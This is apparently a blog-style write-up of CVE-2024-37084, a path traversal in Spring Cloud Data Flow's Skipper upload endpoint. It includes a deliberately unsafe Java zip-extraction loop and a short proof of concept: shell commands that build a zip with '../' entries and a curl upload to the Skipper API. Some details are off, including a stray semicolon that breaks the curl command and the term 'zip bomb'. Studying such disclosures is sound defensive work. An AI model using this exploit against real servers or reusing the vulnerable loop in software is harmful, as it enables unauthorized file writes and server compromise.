CVE-2024-37084 - How a Simple Upload Bug in Spring Cloud Data Flow Let Hackers Compromise Your Skipper Server

> Summary:
CVE-2024-37084 is a high-severity vulnerability discovered in Spring Cloud Data Flow, specifically in versions before 2.11.4. This bug allows an attacker with access to the Skipper server API to write arbitrary files anywhere on the server’s filesystem. This post breaks down how this issue works, what makes it dangerous, and how you can protect your systems.

What is Spring Cloud Data Flow and Skipper?

Spring Cloud Data Flow is a toolkit for building data integration and real-time data processing pipelines in Java microservice architectures. Skipper is an application package manager used by Data Flow for versioned deployment and management.

The API allows users to upload packages (called "releases"), but as we’ll see, it didn’t have the proper security checks in place.

Description:

CVE-2024-37084 is a path traversal flaw in how Skipper handled upload requests. By sending a specially crafted request, an attacker could store files *anywhere* on the server’s file system, not just in the intended directories.

References

- Original advisory at VMware Tanzu
- NVD CVE Entry
- Spring Cloud Data Flow GitHub
- Skipper GitHub

Technical Details – How the Exploit Works

The vulnerable endpoint was Skipper’s /api/package/upload. When you uploaded a new package, you sent a multipart/form-data POST request with a .zip or .tar file containing app artifacts.

Instead of validating file names inside the uploaded archive, Skipper extracted everything as-is. This is dangerous if the archive included files with “dot-dot” paths like ../../myfile.sh. The result is an arbitrary file written to anywhere the web server process has write permissions.

The vulnerable logic looked roughly like this

// BAD! This doesn't sanitize entry names:
for (ZipEntry entry : zipFile.entries()) {
    String fileName = entry.getName();
    File targetFile = new File(uploadDir, fileName);
    // If fileName is ../../../etc/passwd this will overwrite system files!
    writeStream(entry.getInputStream(), new FileOutputStream(targetFile));
}

How to Exploit (PoC)

> Warning: This is for educational purposes. Do not use this against systems without permission.

Create the directory structure

mkdir tmp
echo '#!/bin/bash\necho Hacked' > tmp/evil.sh

Now make a zip with a path traversal

cd tmp
zip ../evil.zip ../../tmp/evil.sh

This creates evil.zip with the entry ../../tmp/evil.sh.

Craft the API Upload Request

You need a POST request to /api/package/upload with the zip file.

Here's a curl snippet

curl -X POST "http://target:7577/api/package/upload"; \
  -F "file=@evil.zip"

Result:

Upon extraction, Skipper writes evil.sh into /tmp/evil.sh. With more knowledge, you could overwrite application JARs or even replace scripts the server will execute.

Upgrade to Spring Cloud Data Flow 2.11.4 or later.

See the fixed code here.

Conclusion

CVE-2024-37084 is a classic example of a dangerous path traversal due to insufficient file validation in an upload handler. A simple zip bomb could result in full server compromise. If you use Spring Cloud Data Flow or Skipper, update immediately, check for signs of compromise, and restrict API access.

For more details, consult the official advisory.

Timeline

Published on: 07/25/2024 10:15:07 UTC
Last modified on: 08/01/2024 13:53:22 UTC